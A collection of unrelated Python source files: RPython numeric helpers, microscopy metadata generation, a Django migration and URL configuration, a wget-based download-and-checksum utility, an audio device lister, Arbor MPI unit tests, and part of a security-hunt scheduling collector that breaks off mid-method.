from rpython.rtyper.lltypesystem.lloperation import llop
return llop.int_force_ge_zero(lltype.Signed, n)
@objectmodel.specialize.ll()
def byteswap(arg):
""" Convert little->big endian and the opposite
"""
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rlib.longlong2float import longlong2float, float2longlong,\
uint2singlefloat, singlefloat2uint
T = lltype.typeOf(arg)
if T == lltype.SingleFloat:
arg = singlefloat2uint(arg)
elif T == lltype.Float:
arg = float2longlong(arg)
elif T == lltype.LongFloat:
assert False
else:
# we cannot do arithmetics on small ints
arg = widen(arg)
if rffi.sizeof(T) == 1:
res = arg
elif rffi.sizeof(T) == 2:
a, b = arg & 0xFF, arg & 0xFF00
res = (a << 8) | (b >> 8)
elif rffi.sizeof(T) == 4:
FF = r_uint(0xFF)
arg = r_uint(arg)
a, b, c, d = (arg & FF, arg & (FF << 8), arg & (FF << 16),
arg & (FF << 24))
res = (a << 24) | (b << 8) | (c >> 8) | (d >> 24)
elif rffi.sizeof(T) == 8:
FF = r_ulonglong(0xFF)
arg = r_ulonglong(arg)
a, b, c, d = (arg & FF, arg & (FF << 8), arg & (FF << 16),
arg & (FF << 24))
e, f, g, h = (arg & (FF << 32), arg & (FF << 40), arg & (FF << 48),
arg & (FF << 56))
res = ((a << 56) | (b << 40) | (c << 24) | (d << 8) | (e >> 8) |
(f >> 24) | (g >> 40) | (h >> 56))
else:
assert False # unreachable code
if T == lltype.SingleFloat:
return uint2singlefloat(rffi.cast(rffi.UINT, res))
if T == lltype.Float:
return longlong2float(rffi.cast(rffi.LONGLONG, res))
return rffi.cast(T, res)
# String parsing support
# ---------------------------
def string_to_int(s, base=10):
"""Utility to converts a string to an integer.
If base is 0, the proper base is guessed based on the leading
characters of 's'. Raises ParseStringError in case of error.
Raises ParseStringOverflowError in case the result does not fit.
"""
from rpython.rlib.rstring import (
NumberStringParser, ParseStringOverflowError, strip_spaces)
s = literal = strip_spaces(s)
p = NumberStringParser(s, literal, base, 'int')
base = p.base
result = 0
while True:
digit = p.next_digit()
if digit == -1:
return result
if p.sign == -1:
digit = -digit
try:
result = ovfcheck(result * base)
result = ovfcheck(result + digit)
except OverflowError:
raise ParseStringOverflowError(p)
string_to_int._elidable_function_ = True
|
# -*- coding: utf-8 -*-
import numpy as np
import logging
import datetime
import oxdls
from .edge_definer import marker_edge_definer
class MetadataMaker():
def __init__(self, image_name, unstitched, datatype):
# Set up attributes and variables
self.boundaries = unstitched.boundaries
self.mosaic_centre = unstitched.mosaic_centre
self.pix2edge = unstitched.pix2edge
self.pixelsize = unstitched.pixel_size
mosaic_dims = self.__get_mosaic_dims()
x_position, y_position = self.__get_x_y_position(self.boundaries, mosaic_dims, unstitched.pixel_size)
physical_mosaic_dims = [dim * unstitched.pixel_size for dim in mosaic_dims]
date_time = datetime.datetime.fromtimestamp(unstitched.modified_timestamp).isoformat() # formatted as: "yyyy-mm-ddThh:mm:ss"
logging.info("Creating OME metadata")
self.ox = oxdls.OMEXML()
image = self.ox.image()
image.set_Name(image_name)
image.set_ID("Image:0")
image.set_AcquisitionDate(date_time)
pixels = image.Pixels
pixels.set_DimensionOrder("XYZCT")
pixels.set_ID("Pixels:0")
pixels.set_PixelType(str(datatype))
pixels.set_SizeX(mosaic_dims[0])
pixels.set_SizeY(mosaic_dims[1])
pixels.set_SizeZ(1)
pixels.set_SizeC(1)
pixels.set_SizeT(1)
pixels.set_PhysicalSizeX(physical_mosaic_dims[0] * 1.e3)
pixels.set_PhysicalSizeXUnit("nm")
pixels.set_PhysicalSizeY(physical_mosaic_dims[1] * 1.e3)
pixels.set_PhysicalSizeYUnit("nm")
pixels.set_PhysicalSizeZ(1) # Z doesn't have corresponding data
pixels.set_PhysicalSizeZUnit("reference frame")
pixels.set_tiffdata_count(1)
pixels.set_plane_count(1)
channel = pixels.channel(0)
channel.set_ID("Channel:0:0")
channel.set_Name("C:0")
tiffdata = pixels.tiffdata(0)
tiffdata.set_FirstC(0)
tiffdata.set_FirstZ(0)
tiffdata.set_FirstT(0)
tiffdata.set_IFD(0)
# Add plane/tiffdata
plane = pixels.plane(0)
plane.set_TheZ(0)
plane.set_TheC(0)
plane.set_TheT(0)
plane.set_PositionXUnit("nm")
plane.set_PositionYUnit("nm")
plane.set_PositionZUnit("reference frame")
plane.set_PositionX(x_position * 1.e3)
plane.set_PositionY(y_position * 1.e3)
plane.set_PositionZ(0)
def add_markers(self, updated_image_name, markerfile):
logging.info("Creating ROIs")
markerlist, marker_numbers = self.__extract_markers(markerfile)
no_of_markers = len(marker_numbers)
image = self.ox.image(0)
image.set_Name(updated_image_name)
image.set_roiref_count(no_of_markers)
self.ox.set_roi_count(no_of_markers)
for count in range(0, no_of_markers, 1):
start, end = marker_edge_definer(
markerlist[count],
self.boundaries,
self.pix2edge
)
image.roiref(count).set_ID(marker_numbers[count])
roi = self.ox.roi(count)
roi.set_ID(marker_numbers[count])
roi.set_Name(f"Marker {marker_numbers[count]}")
rectangle = roi.Union.Rectangle()
rectangle.set_ID(f"Shape:{count}:0")
rectangle.set_Text(f"Area {marker_numbers[count]}")
rectangle.set_TheZ(0)
rectangle.set_TheC(0)
rectangle.set_TheT(0)
# Colour is set using RGBA to int conversion
# RGB colours: Red=-16776961, Green=16711935, Blue=65535
# Calculated the following function from https://docs.openmicroscopy.org/omero/5.5.1/developers/Python.html:
# def rgba_to_int(red, green, blue, alpha=255):
# # Return the color as an Integer in RGBA encoding
# r = red << 24
# g = green << 16
# b = blue << 8
# a = alpha
# rgba_int = r+g+b+a
# if (rgba_int > (2**31-1)): # convert to signed 32-bit int
# rgba_int = rgba_int - 2**32
# return rgba_int
rectangle.set_StrokeColor(-16776961) # Red
rectangle.set_StrokeWidth(20)
rectangle.set_X(start[0])
rectangle.set_Y(start[1])
rectangle.set_Width(end[0] - start[0])
rectangle.set_Height(end[1] - start[1])
def get(self, encoded=False):
if self.ox is not None:
if encoded:
return self.ox.to_xml().encode()
else:
return self.ox
logging.error("Cannot get metadata that has not yet been created.")
return self.ox
def __extract_markers(self, markerfile):
# returns marker coordinates in pixels
array = np.genfromtxt(markerfile, delimiter=",")
marker_coordinates = []
marker_numbers = []
for count in range(len(array[:, 0])):
x, y = array[count, 0:2]
# x is flipped between image and marker coordinates
x = ((-x - self.mosaic_centre[0]) / self.pixelsize)
y = ((y - self.mosaic_centre[1]) / self.pixelsize)
marker_coordinates.append((int(x), int(y)))
marker_numbers.append(int(array[count, -1]))
return marker_coordinates, marker_numbers
@staticmethod
def __get_x_y_position(boundaries, mosaic_dims, pixelsize):
# (minimum position in x & y + half the image size) * pixel size to get physical positions
x_position = (boundaries[0, 0] + (mosaic_dims[0] / 2)) * pixelsize
y_position = (boundaries[0, 1] + (mosaic_dims[1] / 2)) * pixelsize
return x_position, y_position
def __get_mosaic_dims(self):
# In pixels
dim_x = (self.boundaries[1, 0] - self.boundaries[0, 0])
dim_y = (self.boundaries[1, 1] - self.boundaries[0, 1])
return [dim_x, dim_y]
|
# Generated by Django 3.0a1 on 2020-01-30 19:00
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Book',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(help_text='The title of the book.', max_length=70)),
('publication_date', models.DateField(verbose_name='Date the book was published.')),
('isbn', models.CharField(max_length=20, verbose_name='ISBN number of the book.')),
],
),
migrations.CreateModel(
name='Contributor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_names', models.CharField(help_text="The contributor's first name or names.", max_length=50)),
('last_names', models.CharField(help_text="The contributor's last name or names.", max_length=50)),
('email', models.EmailField(help_text='The contact email for the contributor.', max_length=254)),
],
),
migrations.CreateModel(
name='Publisher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='The name of the Publisher.', max_length=50)),
('website', models.URLField(help_text="The Publisher's website.")),
('email', models.EmailField(help_text="The Publisher's email address.", max_length=254)),
],
),
migrations.CreateModel(
name='Review',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField(help_text='The Review text.')),
('rating', models.IntegerField(help_text='The the reviewer has given.')),
('date_created', models.DateTimeField(auto_now_add=True, help_text='The date and time the review was created.')),
('date_edited', models.DateTimeField(help_text='The date and time the review was last edited.', null=True)),
('book', models.ForeignKey(help_text='The Book that this review is for.', on_delete=django.db.models.deletion.CASCADE, to='reviews.Book')),
('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='BookContributor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('role', models.CharField(choices=[('AUTHOR', 'Author'), ('CO_AUTHOR', 'Co-Author'), ('EDITOR', 'Editor')], max_length=20, verbose_name='The role this contributor had in the book.')),
('book', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reviews.Book')),
('contributor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reviews.Contributor')),
],
),
migrations.AddField(
model_name='book',
name='contributors',
field=models.ManyToManyField(through='reviews.BookContributor', to='reviews.Contributor'),
),
migrations.AddField(
model_name='book',
name='publisher',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='reviews.Publisher'),
),
]
|
#!/usr/bin/env python
import os
import sys
import hashlib
import logging
############
#
# Download utilities
#
####
# COPYRIGHT DISCALIMER:
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
#
# Author: Tim Kahlke, tim.kahlke@audiotax.is
# Date: April 2017
#
# Download files using wget
def wget_file(path,f,outdir):
os.system("wget -O %s/%s %s/%s" % (outdir,f,path,f))
# Check MD5 sum of givenfile
def check_md5(f,path):
with open(os.path.join(path,f)) as f:
fl = f.readline()
l = filter(None,fl.split())
filehash = hashlib.md5()
filehash.update(open(os.path.join(path,l[1])).read())
if str(filehash.hexdigest()) != str(l[0]):
return 1
else:
return 0
def down_and_check(ftp,fn,out_dir):
logger = logging.getLogger()
logger.info("\n# [BASTA STATUS] Downloading file %s\n" % (fn))
wget_file(ftp,fn,out_dir)
md5name = fn + ".md5"
logger.info("\n #[BASTA STATUS] Downloading file %s\n" % (md5name))
wget_file(ftp,md5name,out_dir)
logger.info("\n# [BASTA STATUS] Checking MD5 sum of file\n")
while(check_md5(md5name,out_dir)):
logger.error("\n# [BASTA ERROR] MD5 sum mismatch. Re-downloading files!!!\n")
down_and_check(ftp,fn,out_dir)
|
"""activities URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from events.views import Calendar
from base.views import ManagementView, CleanUserView, CleanActivitiesView, BackupView, GroupsMembersView, About
app_name = "base"
urlpatterns = [
url(r'^$', Calendar.as_view()),
url(r'^manage$', ManagementView.as_view(), name="management"),
url(r'^manage/clean_users$', CleanUserView.as_view(), name="clean_users"),
url(r'^manage/clean_activities$', CleanActivitiesView.as_view(), name="clean_activities"),
url(r'^manage/backup$', BackupView.as_view(), name="backup"),
url(r'^manage/groups$', GroupsMembersView.as_view(), name="groups"),
url(r'^manage/groups/add/(?P<pk>\d+)$', GroupsMembersView.as_view(),
kwargs={"operation": "add"}, name="groups_add"),
url(r'^manage/groups/remove/(?P<pk>\d+)$', GroupsMembersView.as_view(),
kwargs={"operation": "remove"}, name="groups_remove"),
url(r'^manage/groups/clear/(?P<pk>\d+)$', GroupsMembersView.as_view(),
kwargs={"operation": "clear"}, name="groups_clear"),
url(r'^about$', About.as_view(), name="about")
]
|
#!/usr/bin/env python3
import pyaudio
import sys
sys.path.insert(0, "../")
from pwmaudio import noALSAerror
with noALSAerror():
p = pyaudio.PyAudio()
info = p.get_host_api_info_by_index(0)
print(p.get_host_api_count())
print(info)
numdevices = info.get('deviceCount')
for i in range(0, numdevices):
if (p.get_device_info_by_host_api_device_index(0, i).get('maxOutputChannels')) > 0:
# print("Output Device id ", i, " - ", p.get_device_info_by_host_api_device_index(0, i).get('name'))
print("Output Device id ", i, " - ", p.get_device_info_by_host_api_device_index(0, i))
|
# -*- coding: utf-8 -*-
#
# test_contexts_mpi4py.py
import unittest
import arbor as arb
# to be able to run .py file from child directory
import sys, os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
try:
import options
except ModuleNotFoundError:
from test import options
# check Arbor's configuration of mpi
mpi_enabled = arb.__config__["mpi"]
mpi4py_enabled = arb.__config__["mpi4py"]
if (mpi_enabled and mpi4py_enabled):
import mpi4py.MPI as mpi
"""
all tests for distributed arb.context using mpi4py
"""
# Only test class if env var ARB_WITH_MPI4PY=ON
@unittest.skipIf(mpi_enabled == False or mpi4py_enabled == False, "MPI/mpi4py not enabled")
class Contexts_mpi4py(unittest.TestCase):
def test_initialized_mpi4py(self):
# test mpi initialization (automatically when including mpi4py: https://mpi4py.readthedocs.io/en/stable/mpi4py.run.html)
self.assertTrue(mpi.Is_initialized())
def test_communicator_mpi4py(self):
comm = arb.mpi_comm(mpi.COMM_WORLD)
# test that set communicator is MPI_COMM_WORLD
self.assertEqual(str(comm), '<arbor.mpi_comm: MPI_COMM_WORLD>')
def test_context_mpi4py(self):
comm = arb.mpi_comm(mpi.COMM_WORLD)
# test context with mpi
ctx = arb.context(mpi=comm)
self.assertTrue(ctx.has_mpi)
def test_context_allocation_mpi4py(self):
comm = arb.mpi_comm(mpi.COMM_WORLD)
# test context with alloc and mpi
alloc = arb.proc_allocation()
ctx = arb.context(alloc, comm)
self.assertEqual(ctx.threads, alloc.threads)
self.assertTrue(ctx.has_mpi)
def test_exceptions_context_arbmpi(self):
alloc = arb.proc_allocation()
with self.assertRaisesRegex(RuntimeError,
"mpi must be None, or an MPI communicator"):
arb.context(mpi='MPI_COMM_WORLD')
with self.assertRaisesRegex(RuntimeError,
"mpi must be None, or an MPI communicator"):
arb.context(alloc, mpi=0)
def test_finalized_mpi4py(self):
# test mpi finalization (automatically when including mpi4py, but only just before the Python process terminates)
self.assertFalse(mpi.Is_finalized())
def suite():
# specify class and test functions as tuple (here: all tests starting with 'test' from class Contexts_mpi4py
suite = unittest.makeSuite(Contexts_mpi4py, ('test'))
return suite
def run():
v = options.parse_arguments().verbosity
comm = arb.mpi_comm(mpi.COMM_WORLD)
alloc = arb.proc_allocation()
ctx = arb.context(alloc, comm)
rank = ctx.rank
if rank == 0:
runner = unittest.TextTestRunner(verbosity = v)
else:
sys.stdout = open(os.devnull, 'w')
runner = unittest.TextTestRunner(stream=sys.stdout)
runner.run(suite())
if __name__ == "__main__":
run()
|
# vim: sw=4:ts=4:et:cc=120
#
# ACE Hunting System
#
# How this works:
# A HunterCollector reads the config and loads all the sections that start with hunt_type_
# each of these configuration settings defines a "hunt type" (example: qradar, splunk, etc...)
# each section looks like this:
# [hunt_type_TYPE]
# module = path.to.module
# class = HuntClass
# rule_dirs = hunts/dir1,hunts/dir2
# concurrency_limit = LIMIT
#
# TYPE is some unique string that identifies the type of the hunt
# the module and class settings define the class that will be used that extends saq.collector.hunter.Hunt
# rule_dirs contains a list of directories to load rules ini formatted rules from
# and concurrency_limit defines concurrency constraints (see below)
#
# Each of these "types" is managed by a HuntManager which loads the Hunt-based rules and manages the execution
# of these rules, apply any concurrency constraints required.
#
import configparser
import datetime
import importlib
import logging
import operator
import os, os.path
import signal
import threading
import sqlite3
from croniter import croniter
from croniter import croniter
import pytz
import saq
from saq.collectors import Collector, Submission
from saq.constants import *
from saq.error import report_exception
from saq.network_semaphore import NetworkSemaphoreClient
from saq.util import local_time, create_timedelta, abs_path, create_directory
class InvalidHuntTypeError(ValueError):
pass
def get_hunt_db_path(hunt_type):
return os.path.join(saq.DATA_DIR, saq.CONFIG['collection']['persistence_dir'], 'hunt', f'{hunt_type}.db')
def open_hunt_db(hunt_type):
"""Utility function to open sqlite3 database with correct parameters."""
return sqlite3.connect(get_hunt_db_path(hunt_type), detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)
class Hunt(object):
"""Abstract class that represents a single hunt."""
def __init__(
self,
enabled=None,
name=None,
description=None,
manager=None,
alert_type=None,
analysis_mode=None,
frequency=None,
tags=[]):
self.enabled = enabled
self.name = name
self.description = description
self.manager = manager
self.alert_type = alert_type
self.analysis_mode = analysis_mode
self.frequency = frequency
self.tags = tags
self.cron_schedule = None
self.queue = QUEUE_DEFAULT
# a datetime.timedelta that represents how long to suppress until this hunt starts to fire again
self.suppression = None
# datetime.datetime of when the suppression currently applied to this hunt ends
# if this value is None then no suppression is currently being applied
self.suppression_end = None
# the last time the hunt was executed
# see the last_executed_time property
#self.last_executed_time = None # datetime.datetime
# a threading.RLock that is held while executing
self.execution_lock = threading.RLock()
# a way for the controlling thread to wait for the hunt execution thread to start
self.startup_barrier = threading.Barrier(2)
# if this is True then we're executing the Hunt outside of normal operations
# in that case we don't want to record any of the execution time stamps
self.manual_hunt = False
# this property maps to the "tool_instance" property of alerts
# this shows where the alert came from
# by default we use localhost
# subclasses might use the address or url they are hitting for their queries
self.tool_instance = 'localhost'
# when we load from an ini file we record the last modified time of the file
self.ini_path = None
self.last_mtime = None
@property
def type(self):
if self.manager is not None:
return self.manager.hunt_type or None
else:
return None
@property
def last_executed_time(self):
# if we don't already have this value then load it from the sqlite db
if hasattr(self, '_last_executed_time'):
return self._last_executed_time
else:
with open_hunt_db(self.type) as db:
c = db.cursor()
c.execute("SELECT last_executed_time FROM hunt WHERE hunt_name = ?",
(self.name,))
row = c.fetchone()
if row is None:
self._last_executed_time = None
return self._last_executed_time
else:
self._last_executed_time = row[0]
if self._last_executed_time is not None and self._last_executed_time.tzinfo is None:
self._last_executed_time = pytz.utc.localize(self._last_executed_time)
return self._last_executed_time
@last_executed_time.setter
def last_executed_time(self, value):
if value.tzinfo is None:
value = pytz.utc.localize(value)
with open_hunt_db(self.type) as db:
c = db.cursor()
c.execute("UPDATE hunt SET last_executed_time = ? WHERE hunt_name = ?",
(value.replace(tzinfo=None), self.name))
# NOTE -- datetime with tzinfo not supported by default timestamp converter in 3.6
db.commit()
self._last_executed_time = value
def __str__(self):
return f"Hunt({self.name}[{self.type}])"
def cancel(self):
"""Called when the hunt needs to be cancelled, such as when the system is shutting down.
This must be safe to call even if the hunt is not currently executing."""
logging.warning(f"called cancel on hunt {self} but {self.type} does not support cancel")
def execute_with_lock(self, *args, **kwargs):
# we use this lock to determine if a hunt is running, and, to wait for execution to complete.
logging.debug(f"waiting for execution lock on {self}")
self.execution_lock.acquire()
# remember the last time we executed
self.last_executed_time = local_time()
# notify the manager that this is now executing
# this releases the manager thread to continue processing hunts
logging.debug(f"clearing barrier for {self}")
self.startup_barrier.wait()
submission_list = None
try:
logging.info(f"executing {self}")
start_time = local_time()
return self.execute(*args, **kwargs)
self.record_execution_time(local_time() - start_time)
except Exception as e:
logging.error(f"{self} failed: {e}")
report_exception()
self.record_hunt_exception(e)
finally:
self.startup_barrier.reset()
self.execution_lock.release()
def execute(self, *args, **kwargs):
"""Called to execute the hunt. Returns a list of zero or more saq.collector.Submission objects."""
raise NotImplementedError()
def wait(self, *args, **kwargs):
"""Waits for the hunt to complete execution. If the hunt is not running then it returns right away.
Returns False if a timeout is set and the lock is not released during that timeout.
Additional parameters are passed to execution_lock.acquire()."""
result = self.execution_lock.acquire(*args, **kwargs)
if result:
self.execution_lock.release()
return result
@property
def running(self):
"""Returns True if the hunt is currently executing, False otherwise."""
# when the hunt is executing it will have this lock enabled
result = self.execution_lock.acquire(blocking=False)
if result:
self.execution_lock.release()
return False
return True
def load_from_ini(self, path):
"""Loads the settings for the hunt from an ini formatted file. This function must return the
ConfigParser object used to load the settings."""
config = configparser.ConfigParser(interpolation=None)
config.optionxform = str # preserve case when reading option names
config.read(path)
section_rule = config['rule']
# is this a supported type?
if section_rule['type'] != self.type:
raise InvalidHuntTypeError(section_rule['type'])
self.enabled = section_rule.getboolean('enabled')
# if we don't pass the name then we create it from the name of the ini file
self.name = section_rule.get(
'name',
fallback=(os.path.splitext(os.path.basename(path))[0]).replace('_', ' ').title())
self.description = section_rule['description']
# if we don't pass an alert type then we default to the type field
self.alert_type = section_rule.get('alert_type', fallback=f'hunter - {self.type}')
self.analysis_mode = section_rule.get('analysis_mode', fallback=ANALYSIS_MODE_CORRELATION)
# frequency can be either a timedelta or a crontab entry
self.frequency = None
if ':' in section_rule['frequency']:
self.frequency = create_timedelta(section_rule['frequency'])
# suppression must be either empty for a time range
self.suppression = None
if 'suppression' in section_rule and section_rule['suppression']:
self.suppression = create_timedelta(section_rule['suppression'])
self.cron_schedule = None
if self.frequency is None:
self.cron_schedule = section_rule.get('cron_schedule', fallback=section_rule['frequency'])
# make sure this crontab entry parses
croniter(self.cron_schedule)
self.tags = [_.strip() for _ in section_rule['tags'].split(',') if _]
self.queue = section_rule['queue'] if 'queue' in section_rule else QUEUE_DEFAULT
self.ini_path = path
self.last_mtime = os.path.getmtime(path)
return config
@property
def is_modified(self):
""""Returns True if this hunt has been modified since it has been loaded."""
return self.ini_is_modified
@property
def ini_is_modified(self):
"""Returns True if this hunt was loaded from an ini file and that file has been modified since we loaded it."""
try:
return self.last_mtime != os.path.getmtime(self.ini_path)
except FileNotFoundError:
return True
except:
logging.error(f"unable to check last modified time of {self.ini_path}: {e}")
return False
@property
def ready(self):
"""Returns True if the hunt is ready to execute, False otherwise."""
# if it's already running then it's not ready to run again
if self.running:
return False
# is this hunt currently suppressed?
if self.suppression_end:
if datetime.datetime.now() < self.suppression_end:
return False
self.suppression_end = None
logging.info(f"hunt {self} has exited suppression")
# if we haven't executed it yet then it's ready to go
if self.last_executed_time is None:
return True
# otherwise we're not ready until it's past the next execution time
return local_time() >= self.next_execution_time
@property
def next_execution_time(self):
"""Returns the next time this hunt should execute."""
# if using cron schedule instead of frequency
if self.cron_schedule is not None:
if self.last_executed_time is None:
self.last_executed_time = local_time()
cron_parser = croniter(self.cron_schedule, self.last_executed_time)
return cron_parser.get_next(datetime.datetime)
# if using frequency instead of cron shedule
else:
# if it hasn't executed at all yet, then execute it now
if self.last_executed_time is None:
return local_time()
return self.last_executed_time + self.frequency
def apply_suppression(self):
"""Apply suppression to this hunt if it is configured to do so.
This is called by the manager when the hunt generates Submissions."""
if self.suppression:
self.suppression_end = datetime.datetime.now() + self.suppression
logging.info(f"hunt {self} is suppressed until {self.suppression_end}")
def record_execution_time(self, time_delta):
"""Record the amount of time it took to execute this hunt."""
pass
def record_hunt_exception(self, exception):
"""Record the details of a failed hunt."""
pass
CONCURRENCY_TYPE_NETWORK_SEMAPHORE = 'network_semaphore'
CONCURRENCY_TYPE_LOCAL_SEMAPHORE = 'local_semaphore'
class HuntManager(object):
"""Manages the hunting for a single hunt type."""
def __init__(self,
collector,
hunt_type,
rule_dirs,
hunt_cls,
concurrency_limit,
persistence_dir,
update_frequency,
config):
assert isinstance(collector, Collector)
assert isinstance(hunt_type, str)
assert isinstance(rule_dirs, list)
assert issubclass(hunt_cls, Hunt)
assert concurrency_limit is None or isinstance(concurrency_limit, int) or isinstance(concurrency_limit, str)
assert isinstance(persistence_dir, str)
assert isinstance(update_frequency, int)
# reference to the collector (used to send the Submission objects)
self.collector = collector
# primary execution thread
self.manager_thread = None
# thread that handles tracking changes made to the hunts loaded from ini
self.update_manager_thread = None
# shutdown valve
self.manager_control_event = threading.Event()
self.wait_control_event = threading.Event()
# control signal to reload the hunts (set by SIGHUP indirectly)
self.reload_hunts_flag = False
# the type of hunting this manager manages
self.hunt_type = hunt_type
# the list of directories that contain the hunt configuration ini files for this type of hunt
self.rule_dirs = rule_dirs
# the class used to instantiate the rules in the given rules directories
self.hunt_cls = hunt_cls
# when loaded from config, store the entire config so it available to Hunts
self.config = config
# sqlite3 database used to keep track of hunt persistence data
create_directory(os.path.dirname(get_hunt_db_path(self.hunt_type)))
if not os.path.exists(get_hunt_db_path(self.hunt_type)):
with open_hunt_db(self.hunt_type) as db:
c = db.cursor()
# XXX have to support all future schemas here -- not a great design
c.execute("""
CREATE TABLE hunt (
hunt_name TEXT NOT NULL,
last_executed_time timestamp,
last_end_time timestamp )""")
c.execute("""
CREATE UNIQUE INDEX idx_name ON hunt(hunt_name)""")
db.commit()
# the list of Hunt objects that are being managed
self._hunts = []
# acquire this lock before making any modifications to the hunts
self.hunt_lock = threading.RLock()
# the ini files that failed to load
self.failed_ini_files = {} # key = ini_path, value = os.path.getmtime()
# the ini files that we skipped
self.skipped_ini_files = set() # key = ini_path
# the type of concurrency contraint this type of hunt uses (can be None)
# use the set_concurrency_limit() function to change it
self.concurrency_type = None
# the local threading.Semaphore if the type is CONCURRENCY_TYPE_LOCAL_SEMAPHORE
# or the string name of the network semaphore if tye type is CONCURRENCY_TYPE_NETWORK_SEMAPHORE
self.concurrency_semaphore = None
if concurrency_limit is not None:
self.set_concurrency_limit(concurrency_limit)
# this is set to True if load_hunts_from_config() is called
# and used when reload_hunts_flag is set
self.hunts_loaded_from_config = False
# how often do we check to see if the hunts have been modified?
self.update_frequency = update_frequency
def __str__(self):
return f"Hunt Manager({self.hunt_type})"
@property
def hunts(self):
"""Returns a sorted copy of the list of hunts in execution order."""
return sorted(self._hunts, key=operator.attrgetter('next_execution_time'))
def get_hunts(self, spec):
"""Returns the hunts that match the given specification, where spec is a function that takes a Hunt
as it's single parameter and return True or False if it should be included in the results."""
return [hunt for hunt in self._hunts if spec(hunt)]
def get_hunt(self, spec):
"""Returns the first hunt that matches the given specification, where spec is a function that takes a Hunt
as it's single parameter and return True or False if it should be included in the results.
Returns None if no hunts are matched."""
result = self.get_hunts(spec)
if not result:
return None
return result[0]
def get_hunt_by_name(self, name):
"""Returns the Hunt with the given name, or None if the hunt does not exist."""
for hunt in self._hunts:
if hunt.name == name:
return hunt
return None
def signal_reload(self):
"""Signals to this manager that the hunts should be reloaded.
The work takes place on the manager thread."""
logging.debug("received signal to reload hunts")
self.reload_hunts_flag = True
self.wait_control_event.set()
def reload_hunts(self):
"""Reloads the hunts. This is called when reload_hunts_flag is set to True.
If the hunts were loaded from the configuration then the current Hunt objects
are discarded and new ones are loaded from configuration.
Otherwise this function does nothing."""
self.reload_hunts_flag = False
if not self.hunts_loaded_from_config:
logging.debug(f"{self} received signal to reload but hunts were not loaded from configuration")
return
logging.info(f"{self} reloading hunts")
# first cancel any currently executing hunts
self.cancel_hunts()
self.clear_hunts()
self.load_hunts_from_config()
def start(self):
self.manager_control_event.clear()
self.load_hunts_from_config()
self.manager_thread = threading.Thread(target=self.loop, name=f"Hunt Manager {self.hunt_type}")
self.manager_thread.start()
self.update_manager_thread = threading.Thread(target=self.update_loop,
name=f"Hunt Manager Updater {self.hunt_type}")
self.update_manager_thread.start()
def debug(self):
self.manager_control_event.clear()
self.load_hunts_from_config()
self.execute()
def stop(self):
logging.info(f"stopping {self}")
self.manager_control_event.set()
self.wait_control_event.set()
for hunt in self.hunts:
try:
hunt.cancel()
except Exception as e:
logging.error("unable to cancel hunt {hunt}: {e}")
report_exception()
def wait(self, *args, **kwargs):
self.manager_control_event.wait(*args, **kwargs)
for hunt in self._hunts:
hunt.wait(*args, **kwargs)
if self.manager_thread:
self.manager_thread.join()
if self.update_manager_thread:
self.update_manager_thread.join()
def update_loop(self):
logging.debug(f"started update manager for {self}")
while not self.manager_control_event.is_set():
try:
self.manager_control_event.wait(timeout=self.update_frequency)
if not self.manager_control_event.is_set():
self.check_hunts()
except Exception as e:
logging.error(f"uncaught exception {e}")
report_exception()
logging.debug(f"stopped update manager for {self}")
def check_hunts(self):
"""Checks to see if any existing hunts have been modified, created or deleted."""
logging.debug("checking for hunt modifications")
trigger_reload = False
with self.hunt_lock:
# have any hunts been modified?
for hunt in self._hunts:
if hunt.is_modified:
logging.info(f"detected modification to {hunt}")
trigger_reload = True
# if any hunts failed to load last time, check to see if they were modified
for ini_path, mtime in self.failed_ini_files.items():
try:
if os.path.getmtime(ini_path) != mtime:
logging.info(f"detected modification to failed ini file {ini_path}")
trigger_reload = True
except Exception as e:
logging.error(f"unable to check failed ini file {ini_path}: {e}")
# are there any new hunts?
existing_ini_paths = set([hunt.ini_path for hunt in self._hunts])
for ini_path in self._list_hunt_ini():
if ( ini_path not in existing_ini_paths
and ini_path not in self.failed_ini_files
and ini_path not in self.skipped_ini_files ):
logging.info(f"detected new hunt ini {ini_path}")
trigger_reload = True
if trigger_reload:
self.signal_reload()
def loop(self):
logging.debug(f"started {self}")
while not self.manager_control_event.is_set():
try:
self.execute()
except Exception as e:
logging.error(f"uncaught exception {e}")
report_exception()
self.manager_control_event.wait(timeout=1)
if self.reload_hunts_flag:
self.reload_hunts()
logging.debug(f"stopped {self}")
def execute(self):
# the next one to run should be the first in our list
for hunt in self.hunts:
if not hunt.enabled:
continue
if hunt.ready:
